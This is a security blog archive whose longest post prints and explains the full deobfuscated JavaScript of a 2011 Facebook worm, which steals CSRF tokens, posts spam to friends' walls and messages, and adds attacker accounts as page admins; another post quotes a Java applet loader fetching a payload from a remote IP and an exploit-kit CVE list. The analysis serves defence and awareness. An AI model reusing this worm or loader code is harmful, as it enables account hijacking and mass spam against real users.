Archive

Archive for the ‘Security’ Category

Hide your source IP with emails relayed by postfix

2013/01/03 1 comment

I hate giving to much information with emails i send. If you are using a native E-Mail client (e.g. Outlook, Thunderbird, ..) you will most likely relay your email to a mail provider.
E-Mail clients are very chatty programs and do not hesitate to give out as much information form the sender as possible. These includes at least:

– Source IP address (the outgoing IP address of your pc)- Your E-Mail client software (Outlook, Exchange Server aso.)
– The version of your used software

Attackers can use these informations to create specialized attacks against your infrastructure, as your email header provides info that f.e. you are using an old Outlook version with know vulnerabilities.

To prevent this information disclosure i perform the following header_checks on my postfix:

/^Received:/    IGNORE
/^User-Agent:/  IGNORE
/^X-Mailer:/    IGNORE
/^X-MimeOLE:/   IGNORE
/^X-MSMail-Priority:/   IGNORE
/^X-Spam-Status:/   IGNORE
/^X-Spam-Level:/    IGNORE
/^X-Sanitizer:/     IGNORE
/^X-Originating-IP:/    IGNORE

Just add these entries to your header_checks file (e.g /etc/postfix/header_checks) and add

header_checks = regexp:/etc/postfix/header_checks

to your /etc/postfix/main.cf

Thats it! Outgoing mails have now all your internal details removed.

Caution!

To prevent your mails being blocked by the Exchange spam filter, never ever remove the Message-ID with policies like above. Otherwise your e-mails will always arrive in the Junk-Mail folder!

profileview.info disassembled – Or the anatomy of a facebook worm

2011/02/22 Leave a comment

Have you received one of those links per Facebook?

Wow! Seems like lots of people stalk me – http://ow.ly/3YDVb
Secret tool shows who stalks your pics – http://tinyurl.com/6gowfed
New FB tool shows who stalks your profile– http://ow.ly/3YDVB
Insane! Awesome tool to see who looks at your pics >> http://goo.gl/lfDvG

Don’t click them. I will show you why:

When you access the Website, it starts a javascript encoded as shell code:

http://pastebin.com/umwmnbaN

It really looks like garbage so lets decompile it

http://pastebin.com/FmGN13Tm

So lets see what it does (Comments are always BELOW the code):

function obscurify(my_content) {
st = my_content[‘split’](‘,’);
d = ”;
for (i = 0; i < st[‘length’]; i++) {
d += String[‘fromCharCode’](st[i] – 24);
};
eval(d);
};

Ok, its deobscurifying the content of the code

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
iemails = array_emails[‘split’](‘,’);
main_emails = [];
for (i = 0; i < iemails[‘length’]; i++) {
main_emails[i] = ‘friendselector_input[]=’ + iemails[i] + ‘&friend_selected[]=’;
};
with(newx = new XMLHttpRequest) {
open(‘POST’, ‘/pages/edit/?id=’ + evil_facebook_page + ‘&sk=admin’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + Form_ID + ‘&fb_dtsg=’ + csrf_token + ‘&fbpage_id=’ + evil_facebook_page + ‘&’ + main_emails[‘join’](‘&’) + ‘&save=1’);
};
};

Here is the function to invite your friends to the app

function makePost(form_id, message_content, target_friend, unused_var1) {
formx = form_id[‘match’](/name=”post_form_id” value=”([\d\w]+)”/)[1];
dtx = form_id[‘match’](/name=”fb_dtsg” value=”([^”]+)”/)[1];
composerx = form_id[‘match’](/name=\\\”xhpc_composerid\\\” value=\\\”([^”]+)\\\”/)[1];
msg = message_content[‘randomize’]() + ‘\x0A\x0A’;
text_post = ”;
text_actual = ”;
pxt = ‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&xhpc_composerid=’ + composerx + ‘&xhpc_targetid=’ + target_friend[‘split’](‘|’)[0] + ‘&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=’ + encodeURIComponent(msg + text_actual[‘replace’](/\, $/, ”)) + ‘&xhpc_message=’ + encodeURIComponent(msg + text_post[‘replace’](/\, $/, ”)) + ‘&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest’;
update(pxt);
};

This is the mail function for spamming your friends

function update(evil_facebook_app) {
with(newx = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/updatestatus.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(evil_facebook_app);
};
};

This function posts on your wall (setting status messsage)

goog1 = ‘http://goo.gl/cvY4D&#8217;;
goog2 = ‘http://goo.gl/euvS3&#8217;;
goog3 = ‘http://tiny.cc/v1bwd&#8217;;
goog4 = ‘http://goo.gl/G0yae&#8217;;
goog5 = ‘http://goo.gl/NMclq&#8217;;
goog6 = ‘http://goo.gl/S89Bx&#8217;;
event_id = ‘168046893242650’;
page_id_x = ‘195926070436089’;
page_id_xx = ‘136589129739532’;
statuses = [‘Wow! Seems like lots of people stalk me – ‘ + goog1, ‘New FB tool shows who stalks your profile– ‘ + goog2, ‘Secret tool shows who stalks your pics ‘ + goog3, ‘Insane! Awesome tool to see who looks at your pics >> ‘ + goog4, ‘According to ‘ + goog5 + ‘ you\’re my top stalker. Creep.’, ‘Secret tool shows who stalks your pics – ‘ + goog6];
subjects = [‘Check this out!’, ‘Hey, whats happening?’, ‘Hey! This is awesome’];

Here are the links for the spam messages

admin_emails = ‘wintersaccohoqr@hotmail.com,adrialovato306@yahoo.com’;

These are the accounts of the creators of the malware, receiving all your facebook email adresses, they are sold to spammers…

Array[‘prototype’][‘randomize’] = function () {
return this[Math[‘floor’](Math[‘random’]() * this[‘length’])];
};
Object[‘prototype’][‘isReady’] = function () {
if (this[‘readyState’] == 4 && this[‘status’] == 200) {
return true;
} else {
return false;
};
};
String[‘prototype’][‘getFriends’] = function () {
friends2 = this[‘match’](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\”>(<span[^>]+>|)[^<>]+/gi)[‘join’](‘:’)[‘replace’](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, ”)[‘replace’](/\\\\\\\”>/gi, ‘|’)[‘split’](‘:’)[‘slice’](1);
return friends2;
};

Prototype functions

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
iemails = array_emails[‘split’](‘,’);
main_emails = [];
for (i = 0; i < iemails[‘length’]; i++) {
main_emails[i] = ‘friendselector_input[]=’ + iemails[i] + ‘&friend_selected[]=’;
};
with(newx = new XMLHttpRequest) {
open(‘POST’, ‘/pages/edit/?id=’ + evil_facebook_page + ‘&sk=admin’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + Form_ID + ‘&fb_dtsg=’ + csrf_token + ‘&fbpage_id=’ + evil_facebook_page + ‘&’ + main_emails[‘join’](‘&’) + ‘&save=1’);
};
};

Ok, the addAdmin function again, the guys didn’t know much about coding.

function loading() {
var _0x91e5x10 = document[‘createElement’](‘div’);
_0x91e5x10[‘id’] = ‘screwyouz’;
_0x91e5x10[‘setAttribute’](‘align’, ‘center’);
_0x91e5x10[‘style’][‘margin’] = ‘0px auto’;
_0x91e5x10[‘style’][‘position’] = ‘absolute’;
_0x91e5x10[‘style’][‘top’] = ’10px’;
_0x91e5x10[‘style’][‘zindex’] = ‘100’;
_0x91e5x10[‘className’] = ‘screwyou’;
_0x91e5x10[‘innerHTML’] = ‘<br /><br /><br /><br /><br /><center><img src=”http://fbviews.org/process.gif&#8221; /><br />Scanning may take up to 3 minutes</center>’;
document[‘body’][‘appendChild’](_0x91e5x10);
};

This is what the coders of the malware think of you. “Screwyou”. Its showing an animation, like it would scan your profile. Its just b**s***

function makePost(form_id, message_content, target_friend, unused_var1) {

<snip>

function update(evil_facebook_app) {

<snip>

Copy & Paste can sometimes be a hard job, you loose control how often you paste something….

if (window[‘location’][‘href’] == ‘http://www.facebook.com/&#8217;) {
formx = (res = document[‘body’][‘innerHTML’])[‘match’](/name=”post_form_id” value=”([\d\w]+)”/)[1];
dtx = res[‘match’](/name=”fb_dtsg” value=”([^”]+)”/)[1];
composerx = res[‘match’](/name=\\\”xhpc_composerid\\\” value=\\\”([^”]+)\\\”/)[1];
} else {
with(muhaha = new XMLHttpRequest) {
open(‘GET’, ‘/’, false);
send(null);
};
formx = (res = muhaha[‘responseText’])[‘match’](/name=”post_form_id” value=”([\d\w]+)”/)[1];
dtx = res[‘match’](/name=”fb_dtsg” value=”([^”]+)”/)[1];
composerx = res[‘match’](/name=\\\”xhpc_composerid\\\” value=\\\”([^”]+)\\\”/)[1];
};

Now they gather a new CSRF Code of the post field in the facebook site. This feature should normaly prevent Cross-Side-Request-Forgery

alert(‘Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.’);

This shows the messagebox, like it would take so long to scan your profile. In reality its just posting on all of your friends walls and sending out emails..Its also making you a fan of the malware…

update(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&xhpc_composerid=’ + composerx + ‘&xhpc_targetid=’ + document[‘cookie’][‘match’](/c_user=(\d+)/)[1] + ‘&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=’ + encodeURIComponent(stx = statuses[‘randomize’]()) + ‘&xhpc_message=’ + encodeURIComponent(stx) + ‘&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest’);
with(newz = new XMLHttpRequest) {
loading();
open(‘POST’, ‘/ajax/pages/fan_status.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘fbpage_id=’ + page_id_x + ‘&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&post_form_id_source=AsyncRequest’);
};
with(newzz = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/pages/fan_status.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘fbpage_id=’ + page_id_xx + ‘&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&post_form_id_source=AsyncRequest’);
};
void 0;
with(fr = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/browser/list/friends/all/?uid=’ + (me = document[‘cookie’][‘match’](/c_user=(\d+)/)[1]) + ‘&offset=0&dual=1&__a=1’);
onreadystatechange = function () {
if (fr[‘isReady’]()) {
friends = fr[‘responseText’][‘getFriends’]();
idx = [];
for (i = 0; i < friends[‘length’]; i++) {
if (!isNaN(friends[i][‘split’](‘|’)[0])) {
idx[i] = ‘ids[‘ + i + ‘]=’ + friends[i][‘split’](‘|’)[0];
};
};
with(invi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/social_graph/invite_dialog.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&’ + idx[‘join’](‘&’) + ‘&node_id=’ + event_id + ‘&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest’);
};
cnt_fr = 0;
tx = setInterval(function () {
if (cnt_fr == friends[‘length’]) {
window[‘location’] = ‘http://fbviews.org/result.php&#8217;;
clearInterval(tx);
};
makePost(document[‘body’][‘innerHTML’], statuses, friends[cnt_fr], friends);
with(xa = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/messaging/composer.php?__a=1&__d=1’);
onreadystatechange = function () {
if (xa[‘isReady’]()) {
compi = xa[‘responseText’][‘match’](/([\d\w]+)_error/)[1];
pxi = ‘ids_’ + compi + ‘[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&subject=’ + encodeURIComponent(subjects[‘randomize’]()) + ‘&status=’ + encodeURIComponent(statuses[‘randomize’]()) + ‘&ids[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&action=send_new&home_tab_id=1&profile_id=’ + document[‘cookie’][‘match’](/c_user=(\d+)/)[1] + ‘&target_id=0&app_id=&&composer_id=’ + compi + ‘&hey_kid_im_a_composer=true&thread&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest’;
if (cnt_fr < 15) {
with(mi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(pxi);
};
};
};
};
send(null);
};
cnt_fr += 1;
}, 3000);
};
};
send(null);
};

This is the code doing the dirty work..

with(fr = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/browser/list/friends/all/?uid=’ + (me = document[‘cookie’][‘match’](/c_user=(\d+)/)[1]) + ‘&offset=0&dual=1&__a=1’);

It browses all your friends

onreadystatechange = function () {

if (fr[‘isReady’]()) {
friends = fr[‘responseText’][‘getFriends’]();
idx = [];
for (i = 0; i < friends[‘length’]; i++) {
if (!isNaN(friends[i][‘split’](‘|’)[0])) {
idx[i] = ‘ids[‘ + i + ‘]=’ + friends[i][‘split’](‘|’)[0];
};
};
with(invi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/social_graph/invite_dialog.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&’ + idx[‘join’](‘&’) + ‘&node_id=’ + event_id + ‘&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest’);
};

 

Send them an invitation

 

cnt_fr = 0;
tx = setInterval(function () {
if (cnt_fr == friends[‘length’]) {
window[‘location’] = ‘http://fbviews.org/result.php&#8217;;

 

This is the page trying to calculate who visits who.

clearInterval(tx);
};
makePost(document[‘body’][‘innerHTML’], statuses, friends[cnt_fr], friends);
with(xa = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/messaging/composer.php?__a=1&__d=1’);
onreadystatechange = function () {
if (xa[‘isReady’]()) {
compi = xa[‘responseText’][‘match’](/([\d\w]+)_error/)[1];
pxi = ‘ids_’ + compi + ‘[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&subject=’ + encodeURIComponent(subjects[‘randomize’]()) + ‘&status=’ + encodeURIComponent(statuses[‘randomize’]()) + ‘&ids[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&action=send_new&home_tab_id=1&profile_id=’ + document[‘cookie’][‘match’](/c_user=(\d+)/)[1] + ‘&target_id=0&app_id=&&composer_id=’ + compi + ‘&hey_kid_im_a_composer=true&thread&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest’;
if (cnt_fr < 15) {
with(mi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(pxi);
};
};
};
};
send(null);
};
cnt_fr += 1;
}, 3000);
};
};
send(null);
};
with(ins = new XMLHttpRequest) {
open(‘GET’, ‘/insights/?_fb_noscript=1’);
onreadystatechange = function () {
if (ins[‘isReady’]()) {
ids = ins[‘responseText’][‘match’](/po_\d+”>View/gi)[‘join’](‘:’)[‘replace’](/(po_|”>View)/gi, ”)[‘split’](‘:’);
cnt_pages = 0;
tz = setInterval(function () {
if (cnt_pages == ids[‘length’]) {
window[‘location’] = ‘http://fbviews.org/result.php&#8217;;
clearInterval(tz);
};
update(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&xhpc_composerid=’ + composerx + ‘&xhpc_targetid=’ + ids[cnt_pages] + ‘&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=’ + encodeURIComponent(stx = statuses[‘randomize’]()) + ‘&xhpc_message=’ + encodeURIComponent(stx) + ‘&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest’);
addAdmin(ids[cnt_pages], admin_emails, formx, dtx);
cnt_pages += 1;
}, 3000);
};
};
send(null);
};

Here it posts the results to your page…

So its a big price for some unreliable information. You give away all your contact email adresses for free and send spam in your name! this will lower your reputation and fill up your email account with viagra mails!

Some more information about the domains:

whois fbviews.org

Domain ID:D161495457-LROR
Domain Name:FBVIEWS.ORG
Created On:14-Feb-2011 05:50:54 UTC
Last Updated On:14-Feb-2011 05:58:34 UTC
Expiration Date:14-Feb-2012 05:50:54 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:de089e4b90247f03
Registrant Name:mister  hood
Registrant Street1:14762 Geronomo st
Registrant Street2:
Registrant Street3:
Registrant City:San Diego
Registrant State/Province:CA
Registrant Postal Code:92105
Registrant Country:US
Registrant Phone:+1.6192264473
Registrant Phone Ext.:
Registrant FAX:+1.5555555555
Registrant FAX Ext.:
Registrant Email:eviewoolfolk579@yahoo.com

whois profileview.info

Domain ID:D36383271-LRMS
Domain Name:PROFILEVIEW.INFO
Created On:17-Jan-2011 03:27:44 UTC
Last Updated On:17-Jan-2011 10:37:21 UTC
Expiration Date:17-Jan-2012 03:27:44 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR72743087
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:PROFILEVIEW.INFO@domainsbyproxy.com

Disable FileZilla Save all credentials behaviour

2011/02/02 Leave a comment

I have been asked how to get rid of the stored passwords in FileZilla.

First, checkout these files:

filezilla.xml, recentservers.xml and sitemanager.xml

On Windows XP

C:\Documents and Settings\<user>\Application Data\FileZilla\

or Vista/Windows 7

C:\Users\<user>\AppData\Roaming\FileZilla\

open them in Wordpad, and BAM! .. it’s like stealing candy from a baby.

You have to edit the C:\Program Files\FileZilla FTP Client\docs\fzdefaults.xml (respectivly under your userprofile) and disable the KIOSK mode!

See the file fzdefaults.xml.example (docs subdirectory). Inside are instructions how to set FileZilla to not save passwords (kiosk mode 1) or not to save anything at all (kiosk mode 2).

As i’m very disappointed from this feature, i would recommend deleting Filezilla (and manually check that the files are gone) and use somthing line WinSCP or a linux.

The Last Line Of Defence on Waledac 2.0

2011/02/02 Leave a comment

TTLOD wrote on their blog about the reappearing Waledac Botnet (a.k.a SLM / Storm) starting sending out malicious e-cards begining with new years eve using stolen credentials.

What seems to be the most impressing here are the analogies to the Primiframe attacks.

In particular, we found that the botmasters have a tremendous amount of stolen credentials. More specifically, they have 123,920 login credentials to FTP servers at their disposal. This number is significant, considering the Waledac controllers use an automated program to login to these servers and patch (or upload) specific files to redirect users to sites that serve malware or promote cheap pharmaceuticals.

I think the amount of stolen credentials from Filezilla users is much higher, it might be some kind of 1 million or more credentials.

Additionally, stored e-mail credentials were stolen in the Waledac attacks

We also discovered 489,528 credentials for POP3 email accounts. These credentials are known to be used for “high-quality” spam campaigns. The technique abuses legitimate mail servers by authenticating as the victim through the SMTP-AUTH protocol to send spam messages. This method makes IP-based blacklist filtering considerably more difficult.

Right now, the priemliframe attacks look like a testrun of new Botnet. The payload seems to just uploads found credentials and exits. It doesnt install itself into the startup directory to not be found from future antivirus clients.

If you had an primliframe attack on your server, change _ALL_ your passwords!

Let’s see whats next.

 

Update on priemIframe hacks

2011/01/24 3 comments

From all the feedback I receive, it seems like the attack is focused on german websites. I drew a flow explaining how the circle of death & destruction works:

Roland Bollmann from www.robodurden.com wrote a php script to cleanup hacked servers. Thanks for the submission:


<?php
// hacked.php version 1.01 2011/01/24
// upload this script somewhere onto your server
// call "find -name php" to get the path to php (like /usr/lib/cgi-bin/php)
// and then call "/usr/lib/cgi-bin/php /home/www/web6/hacked.php path=/"
// to scan and repair the entire server ;-)
//
// www.robodurden.com usage at your own risk :-)

$hC = array(
'filereg'    => '/^.+index\.[^.]+$/i',
'hackmatch'    => '<iframe.+?priemIframe\.php.+?<\/iframe>',
'path'        => '.',
'test'    => 0
);

$sHtml = $_SERVER['PHP_SELF'] ? '<br/>' : '';

if ($sHtml)
{
print "run from http$sHtml\n";
foreach($hC AS $name => $var)
{
if (isset($_GET[$name]))    $hC[$name] = $_GET[$name];
}
}
else
{
print "run from console. usage: hacked.php [option1=value1] [option2=value2] ..\n";
for ($i=1; $i<count($argv); $i++)
{
list($name,$var) = explode('=',$argv[$i]);
if (isset($hC[$name]))
{
$hC[$name] = $var;
}
else    die("unkown command '$name'. possible commands:
'filereg'    = '/^.+index\.[^.]+\$/i'
'hackmatch'    = '<iframe.+?priemIframe\.php.+?<\/iframe>'
'path'        = '.'
'test'        = 0
");
}
}

foreach($hC AS $name => $var)
{
if ($sHtml)    print "$name = ".htmlspecialchars($var)."$sHtml\n";
else    print "$name = $var $sHtml\n";
}

$Directory = new RecursiveDirectoryIterator($hC['path']);
$Iterator = new RecursiveIteratorIterator($Directory);
$Regex = new RegexIterator($Iterator, $hC['filereg'], RecursiveRegexIterator::GET_MATCH);

$iTotal = 0;
$iTotalHits = 0;
foreach($Regex AS $a)
{
foreach($a AS $sPath)
{
$iTotal++;
if ($hC['test'])    print "$sPath$sHtml\n";

if (Load($sPath,$s))
{
$iHits = 0;
while(preg_match('/^(.*)'.$hC['hackmatch'].'(.*)$/s',$s,$aM))
{
$iHits++;
$s = $aM[1].$aM[2];
}
if ($iHits)
{
print "$sPath hits: $iHits$sHtml\n";
if (!$hC['test'])    Save($sPath,$s);

$iTotalHits += $iHits;
}
}
}
}

print "total matches: $iTotal$sHtml\ntotal hits: $iTotalHits$sHtml\n";

function Load($sPath,&$sData)
{
error_reporting(E_ERROR | E_PARSE);
$sData = file_get_contents($sPath);
error_reporting(E_ERROR | E_WARNING | E_PARSE);

if ($sData === FALSE)
{
return 0;
}
return 1;
}

function Save($sPath,$sData)
{
$hfile = fopen($sPath, "w");
if (!$hfile)
{
print("the file $sPath could not be opened for writing :-($sHtml\n");
return 0;
}
fwrite($hfile, $sData);
fclose($hfile);
return 1;
}

?>

 

I just got feedback from german abuse department of 1&1 Server Provider, they will check for these links in their access filters. So the world is a little bit safer now. 🙂

Automated attacks since 12/2010 using compromised credentials / chain reaction

2011/01/12 3 comments

Is your browser giving you a content warning while accessing legitimate websites? You get a virus warning while reading your favorite online newspaper? Here is why:

In october 2010 a “feature” was disclosed that Filezilla caches credentials silently in a XML document. This feature was 0-day before and has been used since then by malware to collect user credentials. Today, there might be a collection of some million compromised records.

Since December 2010, compromised websites are upcoming which are an evidence for an automated mass hack. For this hack it doesnt matter which OS, service or application (cms, joomla) is installed as long as the access password wasn’t changed. So every content can be changed, even save-known, non-active pages like html.

The attack starts with the used protocol, in this example via FTP. The bot starts to retrieve every existing index.* file on server and includes an (hidden) iframe:

http://80.91.191.158/stats/priemIframe.php?hashftp=05f5b2944edd017d509cd3b92bfa7f69&hashpage=0d803ee4896cf18a80a781bb7e308ffd

The files are then uploaded again, together with a PHP Shell and a blackhat-seo framework.

This server based in Ukraine seems to be a counter and decision server. Depending on the OS and used browser the client ist then redirected to a different server. Here a server in Austria:

http://oiewr4.at/gas/dnitezhpyokwhnhwglb2.php

The access is checked for a valid referer (you have to come from the counter server to get content). On a direkt access the php is empty. It strongly depends on the used browser, version and OS which content you reveive. (An up-to-date Firefox blocks the austrian domain immediately due to reports)

When the check is disabled/an older browser is used, and you are using Java you receive the following

<applet mayscript=’true’ archive=’jzdlgoazhzfvkli3.jar’ code=’a.class’><param name=’trigger’ value=’isie’><param name=’url’ valuetype=’ref’ value=’http:/178.162.229.52/gas/dseriwyubrjmkma.bin’></applet><body id=’jpyvaq9′ name=’jpyvaq9′></body>

This Java code uses two different kinds of the sound/midi exploit to infect the client (this IP address is based in India).

Now see how “good” these two “old” java exploits are detected by up-to-date antivirus scanners, only 4 out of 47 detect the malware:

http://www.virustotal.com/file-scan/report.html?id=d72d92174…

http://www.virustotal.com/file-scan/report.html?id=bad21728c…

Here is the link to the pastebin with the malicious code:

http://pastebin.com/TRWGyCfB

Here is the code deobfusicated:

http://pastebin.com/yHHnS64s

You now can easily see the exploited vulnerabilites.

This seems to be the Phoenix Exploit Kit

The Phoenix Exploit Kit includes exploits for the following vulnerabilities:

Flash exploits

Adobe Flash Integer Overflow in AVM2 – CVE-2009-1869
Adobe Flash Integer Overflow in Flash Player CVE-2007-0071

PDF exploits

Adobe Reader CollectEmailInfo Vulnerability CVE-2007-5659
Adobe Reader Collab GetIcon Vulnerability CVE-2009-0927
Adobe Reader LibTiff Vulnerability CVE-2010-0188
Adobe Reader newPlayer Vulnerability CVE-2009-4324
Adobe Reader util.printf Vulnerability CVE-2008-2992

Internet Explorer Exploits

IE MDAC Vulnerability CVE-2006-0003
IE SnapShot Viewer ActiveX Vulnerability CVE-2008-2463
IE iepeers Vulnerability CVE-2010-0806

Java Exploits
JAVA HsbParser.getSoundBank Vulnerability CVE-2009-3867
Java Development Kit Vulnerability CVE-2008-5353

 

I was too slow to decrpyt the script to be able to download the files as the servers have been shutdown in between (half a day).

But these exploits will definately try to drop a (or more) trojan(s) then, search the compromised user account for saved passwords, and might also hook into the browsers to get credentials directly, which then will be submitted to a server, which will be used to compromise the next server. And it goes on and on…

As you can see, even a good virusscanner might allow the trojan to be run. So don’t feel save.

  1. Don’t use filezilla
  2. Never save credentials in the browser
  3. Don’t use Internet Explorer
  4. Keep your OS, Browser and third-party software (Adobe Flash, Java..) up-to-date
  5. Perodically change your passwords
  6. Use security browser plugins like adblockplus and noscript